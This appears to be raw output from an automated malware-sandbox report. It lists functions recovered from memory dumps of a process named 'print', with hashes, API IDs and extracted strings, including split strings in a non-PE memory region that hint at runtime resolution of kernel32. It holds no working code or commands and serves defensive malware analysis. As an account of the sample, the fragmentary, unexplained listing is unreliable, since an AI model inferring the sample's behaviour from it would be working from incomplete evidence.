                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$H
                                  • API String ID: 0-1157430829
                                  • Opcode ID: d86c70dfbebcb6e3874945ac05f520d87498d4802e4292769816de415e2a3abf
                                  • Instruction ID: 736e7e67cac01d6676c641089d5901ce3ffc36e52fb0c72c73404fa86d668c31
                                  • Opcode Fuzzy Hash: d86c70dfbebcb6e3874945ac05f520d87498d4802e4292769816de415e2a3abf
                                  • Instruction Fuzzy Hash: AA914EF04082988AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE8945CB85
                                  Function 00BB716B Relevance: 21.4, Strings: 17, Instructions: 154COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496036532.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_bb0000_print.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                  • API String ID: 0-1539916866
                                  • Opcode ID: 6fb6be4068c40c0e66144bd3aec7c04514228c6075d5bbec2a732c537d9d2c32
                                  • Instruction ID: 66eca022b78c8c7711d6a2d0b58584171ef9ba238a52bf048fa1b2f4ca79f7a1
                                  • Opcode Fuzzy Hash: 6fb6be4068c40c0e66144bd3aec7c04514228c6075d5bbec2a732c537d9d2c32
                                  • Instruction Fuzzy Hash: 2241B370A1CB088FAB14EF98A4896BD7BF6FB88700F00015EE449D3341DBB59D458BD6
                                  Function 02E72890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: c0f7980197824d16b6055bc5180257f02a3fceba879ef3e24b561f0a1919785d
                                  • Instruction ID: 43e21d13167726aae54acfae821d490b5ada3b25696db514c928ac4801e36ca8
                                  • Opcode Fuzzy Hash: c0f7980197824d16b6055bc5180257f02a3fceba879ef3e24b561f0a1919785d
                                  • Instruction Fuzzy Hash: 5951DAB6A80216BFDB10DF98C890A7EF7B8BB08304754E169E999D7641D335DE44CBE0
                                  Function 02EE2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: 4ec8371d4a04d1757b510645aa69fa667e814640b871800a09e11368724083ed
                                  • Instruction ID: c977a833c77cc004ffd3216886b9707a9ba02b15d1ef596114b5b082492eba75
                                  • Opcode Fuzzy Hash: 4ec8371d4a04d1757b510645aa69fa667e814640b871800a09e11368724083ed
                                  • Instruction Fuzzy Hash: 98510471A80645AADF30DF9CC99097FB7FDAF44204B00D459EA9BC7681E774EA04CB60
                                  Function 02E67630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                  Download Yara Rule
                                  Strings
                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02EA4725
                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02EA4655
                                  • Execute=1, xrefs: 02EA4713
                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02EA4742
                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 02EA4787
                                  • ExecuteOptions, xrefs: 02EA46A0
                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02EA46FC
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                  • API String ID: 0-484625025
                                  • Opcode ID: b8d5d315476fb5e7386095512eb314091b51f45c6781d82d0e16a409332bfd47
                                  • Instruction ID: 187028bd7dffbd486e95c81c6e3da2a3fb5ba79ee3b6fd6da248a50cc3a408ff
                                  • Opcode Fuzzy Hash: b8d5d315476fb5e7386095512eb314091b51f45c6781d82d0e16a409332bfd47
                                  • Instruction Fuzzy Hash: 2F512931AC02196AEF119AA4DC99FFEB3B9EF0434DF04A0A9E505AB180D770AE45CF50
                                  Function 02F06940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                  • Instruction ID: bbe741538ff3655138b246eb472a71970bf2939e82a938947fd6263cd31658b4
                                  • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                  • Instruction Fuzzy Hash: 1D0227B1608341AFC305DF18C890A6FB7EAEFC8744F04896DFA859B294DB31E905DB52
                                  Function 02E7B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-$0$0
                                  • API String ID: 1302938615-699404926
                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                  • Instruction ID: f949fdfad2760dc8d142d0cee31748a86dcd2448bf010feee5028ed9b3e090d3
                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                  • Instruction Fuzzy Hash: F581B770E852499EEF24CFA8C8917FE7BB2AF4531CF18E25DE851A7290C7349940CB51
                                  Function 02EE20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$[$]:%u
                                  • API String ID: 48624451-2819853543
                                  • Opcode ID: b5e7e01aab0565496cf4869af94b7f50618a234e4011201e07431ea7223a4463
                                  • Instruction ID: efc82b931e4eea0f7b411b90614f3c157ee6dee3c4e4ab496341eb0ee42d6f03
                                  • Opcode Fuzzy Hash: b5e7e01aab0565496cf4869af94b7f50618a234e4011201e07431ea7223a4463
                                  • Instruction Fuzzy Hash: 3B215E76A40119ABDF10DF79C840AEEBBFDEF54748F049126EE46E3200E7309A058BA1
                                  Function 02E5F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                  Download Yara Rule
                                  Strings
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02EA02BD
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02EA02E7
                                  • RTL: Re-Waiting, xrefs: 02EA031E
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                  • API String ID: 0-2474120054
                                  • Opcode ID: 885e5dbde6f683087bccbcc0b9d56abab0fab44485ff27304dc129a935d567a5
                                  • Instruction ID: 56f0549c94e3b1e31fd462b7914d8a9a8b9596c80bed3ac1655294af4b63f119
                                  • Opcode Fuzzy Hash: 885e5dbde6f683087bccbcc0b9d56abab0fab44485ff27304dc129a935d567a5
                                  • Instruction Fuzzy Hash: ABE11130698741DFD724CF28C890B6AB7E0BF86318F109A2DF9958B6D1D774E844CB92
                                  Function 02E6BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                  Download Yara Rule
                                  Strings
                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02EA7B7F
                                  • RTL: Resource at %p, xrefs: 02EA7B8E
                                  • RTL: Re-Waiting, xrefs: 02EA7BAC
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 0-871070163
                                  • Opcode ID: 8663826ddc7af7bd200aa09ce2c20a85c0f2e20e577c65a3a4b87719cce86a44
                                  • Instruction ID: 5b2389d4b31e97aee2e492e8282141663861e35ebcc1aa65f182f7f27d4b10b2
                                  • Opcode Fuzzy Hash: 8663826ddc7af7bd200aa09ce2c20a85c0f2e20e577c65a3a4b87719cce86a44
                                  • Instruction Fuzzy Hash: BE41E1317817028FD724DE258C54B6AB3E6EF88718F00AA2DF95AEB690D730E405CB91
                                  Function 02E6B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                  Download Yara Rule
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02EA728C
                                  Strings
                                  • RTL: Resource at %p, xrefs: 02EA72A3
                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02EA7294
                                  • RTL: Re-Waiting, xrefs: 02EA72C1
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 885266447-605551621
                                  • Opcode ID: 3de2987efe4bfb37b396a8b39c649edf24c9a504a14b123f8014b7f9b192df2b
                                  • Instruction ID: 2a7a46ca9d29e0e8ca725817f09d643d1f066586bfb20cc992ef5d2d37a04dbe
                                  • Opcode Fuzzy Hash: 3de2987efe4bfb37b396a8b39c649edf24c9a504a14b123f8014b7f9b192df2b
                                  • Instruction Fuzzy Hash: F24106717C02029BD714DE24CC41B6AB7A6FF54758F10A629FD59EB640DB20F842CBE0
                                  Function 02EE2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$]:%u
                                  • API String ID: 48624451-3050659472
                                  • Opcode ID: 0181edf291c8c2da8a19337e0f1590407098e660d1b7637e8f79050d9039f1b0
                                  • Instruction ID: fb9c78d61ac050d4178b97e0a61d8ffbc19b5679b2075a106e27bdd68dabb28b
                                  • Opcode Fuzzy Hash: 0181edf291c8c2da8a19337e0f1590407098e660d1b7637e8f79050d9039f1b0
                                  • Instruction Fuzzy Hash: C9318472A402199FDB20DF28DC40BEEB7FDEB44714F449556ED4AE3240EB309A448FA0
                                  Function 02E77D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-
                                  • API String ID: 1302938615-2137968064
                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                  • Instruction ID: 849dd5b8e266dfd96474f5d920991ec17a237ee2cfabb463ad6ebe6b791434ec
                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                  • Instruction Fuzzy Hash: 6391A470E802169BDF28DE6AC9807BEF7A5FF45728F14E61AE855EB2C0D7309941CB50
                                  Function 02E39126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $$@
                                  • API String ID: 0-1194432280
                                  • Opcode ID: e11ffb001295df07279e20f3e7b6ccf814c2b861ca3cb56aeb86afb493324ecd
                                  • Instruction ID: 4a7b126493367a6f6948a09dc39886665364358ae148d473e66c5d4b9d7d487f
                                  • Opcode Fuzzy Hash: e11ffb001295df07279e20f3e7b6ccf814c2b861ca3cb56aeb86afb493324ecd
                                  • Instruction Fuzzy Hash: CF812C72D402699BDF358F54CC44BEEB7B8AF08754F0191EAAA09B7241D7705E84CFA0
                                  Function 00BB39E8 Relevance: 5.1, Strings: 4, Instructions: 149COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496036532.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_bb0000_print.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .dll$el32$h$kern
                                  • API String ID: 0-4264704552
                                  • Opcode ID: feca1dcbac49141c3710e9c14795f1054297454fe331f2edee9793277b566f40
                                  • Instruction ID: ed0a3a057b1709a9ee6a6aec54aa470abd5714a1cf466321c9c91998a732f4aa
                                  • Opcode Fuzzy Hash: feca1dcbac49141c3710e9c14795f1054297454fe331f2edee9793277b566f40
                                  • Instruction Fuzzy Hash: 0E415070608B4C8FDBA9DF6980943AAB7E1FB98700F144A6ED49EC3255DFB0C585CB42
                                  Function 00BB892B Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496036532.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_bb0000_print.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .$l$l$t
                                  • API String ID: 0-168566397
                                  • Opcode ID: f0d97de21042d1af9d6989998026142b03f28381ffca597fc1c7dc07a58269b4
                                  • Instruction ID: 977ff2682ab2769284487898d40b91ab5b1d72f5b7c3a9cf0bd6068b6f0ebc56
                                  • Opcode Fuzzy Hash: f0d97de21042d1af9d6989998026142b03f28381ffca597fc1c7dc07a58269b4
                                  • Instruction Fuzzy Hash: 9231AF70628B499FD788EF68C084BAABBE1FF54300F4016BEE189C7611DBB5D084C746
                                  Function 00BB8938 Relevance: 5.1, Strings: 4, Instructions: 99COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496036532.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_bb0000_print.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .$l$l$t
                                  • API String ID: 0-168566397
                                  • Opcode ID: dd789c32f70128448c9a2f282fe6e380125480ab6c1fc3e980d28ccf82e15195
                                  • Instruction ID: 199e374c90590d7b01bfc8c88d5fa6f49c7fd0f20e6d6ce42d05df2054bd4069
                                  • Opcode Fuzzy Hash: dd789c32f70128448c9a2f282fe6e380125480ab6c1fc3e980d28ccf82e15195
                                  • Instruction Fuzzy Hash: BD319170628B499FD794FF68C084BBABBE1FB58300F50167EA189C3611DBB5D484C756